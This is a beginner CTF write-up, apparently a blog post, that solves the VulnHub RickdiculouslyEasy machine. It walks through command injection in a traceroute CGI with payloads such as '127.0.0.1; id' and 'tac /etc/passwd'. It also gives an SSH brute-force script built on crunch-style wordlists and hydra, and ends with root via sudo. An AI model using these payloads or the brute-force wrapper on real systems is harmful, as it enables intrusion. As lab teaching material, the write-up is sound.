CTF Write-up RickdiculouslyEasy - VulnHub

Mekhla Upadhyay
Published in IoT Lab KIIT
5 min read · Nov 1, 2021

Rickdiculouslyeasy is a very simple Rick and Morty-themed boot-to-root machine. It's designed to be a beginner CTF; if you're new to pen testing, check it out! There are 130 points' worth of flags available (each flag has its points recorded with it), and we should also get root.
You can get the machine from the following link:
https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/

FINDING THE MACHINE IP
You can find the machine IP with the netdiscover command, which lists the live IP addresses on the local network.

SCANNING & ENUMERATION

Nmap results

Nmap results, showing flag 1.

Nmap reported the first flag in its output for the service on port 13337. (10 points)

PORT 21(FTP service)
We find an FTP (File Transfer Protocol) service with anonymous login enabled, which lets anyone list and download files without credentials. We can connect using anonymous as the username and leave the password blank.

Connecting to FTP.

Found a flag over the FTP connection; retrieved the txt file with the get command. (20 points)

Flag 2.

PORT 9090
In the Nmap results we saw an HTTP service running on port 9090. The page served there contains a flag; its input fields are unresponsive. (30 points)

Page found on port 9090.

PORT 60000
Connecting to port 60000 with netcat gave us another flag. (40 points)

PORT 80
We also find an HTTP service running on port 80. Let's dive into it!

I did a directory search using dirsearch, a command-line web directory scanner. It is multithreaded, which makes it fast, it performs recursive brute-forcing, and it supports HTTP proxies.

dirsearch results

I found a directory called /passwords/ and opened it in the browser. Another interesting entry is the robots.txt file.

Found another flag here. (50 points)

There is another HTML file in /passwords/ that gives us a hint.

Viewing the page source gives us a password for a user ID:

Next we open robots.txt and find links to two files, '/cgi-bin/root_shell.cgi' and '/cgi-bin/tracertool.cgi'.

Only '/cgi-bin/tracertool.cgi' turns out to be useful: its input field is vulnerable to command injection, so anything appended to the traced address is executed on the server.

Through the injection I found three users. Next I tried logging in via SSH on port 22222. Also, the cat command does not work here, so I used tac instead.
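As an added illustration (not the CGI script from the box, whose source we never see), here is the pattern behind the tracertool.cgi bug next to a fixed version: the vulnerable handler pastes the user-supplied target into a shell command string, while the hardened one allow-lists the characters of a hostname or IPv4 literal and passes the value as a single argument. The traced command is stubbed with echo so the script runs offline; the function names are mine.

```shell
#!/bin/sh
# Added example, not code from the write-up or the VulnHub machine.
# The real tool would run traceroute; here "echo traceroute to ..." stands
# in for it so the injection is visible without network access.

# Vulnerable: the target is interpolated into a command string that is
# handed to a shell, so ';', '|', '$(...)' etc. in the input all execute.
vulnerable_trace() {
    target="$1"
    sh -c "echo traceroute to $target"
}

# Hardened: reject anything that is not a hostname/IPv4 character and
# never go through "sh -c"; the value is one argv entry, not shell text.
safe_trace() {
    target="$1"
    case "$target" in
        ""|*[!A-Za-z0-9.-]*)
            echo "rejected: invalid target '$target'" >&2
            return 1 ;;
    esac
    echo traceroute to "$target"
}

# Demo when run directly: the same payload against both handlers.
if [ "${DEMO:-0}" = 1 ]; then
    vulnerable_trace '127.0.0.1; id'   # runs id on the server
    safe_trace       '127.0.0.1; id'   # rejected
    safe_trace       '10.0.0.1'        # traced normally
fi
```

Run with `DEMO=1 sh tracer.sh` to see both behaviours. The payload shape is exactly what the write-up used against the real CGI: a harmless address followed by `;` and the command we actually want (`tac /etc/passwd`, since cat was blocked), which is why a character allow-list on the input, rather than a blocklist of individual commands, is the fix that holds.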

EXPLOITING

I tried logging in by trial and error: we already know the password "winter", so I used it for the user named Summer.

We logged in successfully as Summer and found another flag. (60 points)

Enumerating further, we find the same three users we identified earlier. We can't enter RickSanches's home directory. Under user Morty there is a zip file, but unzipping it needs a password. Next to it is a jpg whose name says it holds the password, so I read the zip password out of it with
'tac Safe_password.jpg'
password: "Meeseek"

We unzip the archive with that password and find another flag and a hint. (80 points)
PS: This flag's format is a bit different, and it helps later on.

There is also a binary named safe which does not run normally: it needs a parameter. Using the number found in the previous flag as the argument, running the binary gives us another flag. (100 points)

It also gives us a hint for Rick's password (which is what gets us root, since Rick can sudo).

PRIVILEGE ESCALATION

The hint says the password contains one uppercase character, one digit and one word from Rick's old band name (which I found by searching; the band is "The Flesh Curtains"). So I used crunch to create a wordlist.
Crunch is a wordlist generator: you give it a character set, either one of its standard sets or your own, and it emits every combination and permutation. In its -t pattern syntax ',' stands for an uppercase letter and '%' for a digit, so I generated one list per word of the band name with ',%' in front of it and concatenated the results into a single word.txt file.

Next I used hydra, a tool for brute-forcing usernames and passwords against services such as FTP, SSH, Telnet, MS-SQL, etc. I ran it against SSH with RickSanches as the username and the wordlist for the password. It finds the password 'P7Curtains', and now we have access to RickSanches.
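For readers without crunch installed, here is an added script (mine, not the author's) that rebuilds the same search space in plain POSIX sh: one uppercase letter, one digit, then one of the three words of "The Flesh Curtains", which is 26 × 10 × 3 = 780 candidates. It also wraps the hydra call against SSH on port 22222; the target address is supplied by the caller (TARGET is a placeholder) and hydra is only invoked when it is set, so the list generation itself runs offline.

```shell
#!/bin/sh
# Added example, not the write-up's own commands. Equivalent to the crunch
# runs in the post:  crunch 5 5 -t ,%The ; crunch 7 7 -t ,%Flesh ;
#                    crunch 10 10 -t ,%Curtains   (',' = uppercase, '%' = digit)

LETTERS=ABCDEFGHIJKLMNOPQRSTUVWXYZ
WORDS="The Flesh Curtains"   # Rick's old band name, from the hint

# Emit every <Uppercase><digit><word> candidate, one per line.
gen_wordlist() {
    i=1
    while [ "$i" -le 26 ]; do
        c=$(printf '%s' "$LETTERS" | cut -c "$i")
        d=0
        while [ "$d" -le 9 ]; do
            for w in $WORDS; do
                printf '%s%s%s\n' "$c" "$d" "$w"
            done
            d=$((d + 1))
        done
        i=$((i + 1))
    done
}

# Size of the search space; worth knowing before pointing hydra at sshd,
# which throttles and logs every failed attempt.
count_candidates() {
    gen_wordlist | wc -l | tr -d ' '
}

# hydra: -l single login, -P password file, -s port, -t parallel tasks
# (kept low so sshd does not drop connections). $1 is the target host.
crack_ssh() {
    gen_wordlist > word.txt
    hydra -l RickSanches -P word.txt -s 22222 -t 4 "ssh://$1"
}

if [ -n "${TARGET:-}" ]; then
    crack_ssh "$TARGET"
fi
```

Usage: `TARGET=10.0.0.5 sh rickpass.sh` (address assumed). With only 780 candidates the list is small enough that the hint, not hydra's speed, is doing the work; the same structure scales badly if the hint had allowed the digit and letter in any position, which is the first thing to check before widening the pattern.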

We switch to the root user with a simple sudo su, and we are root! We found the root flag. Voila!! (130 points)
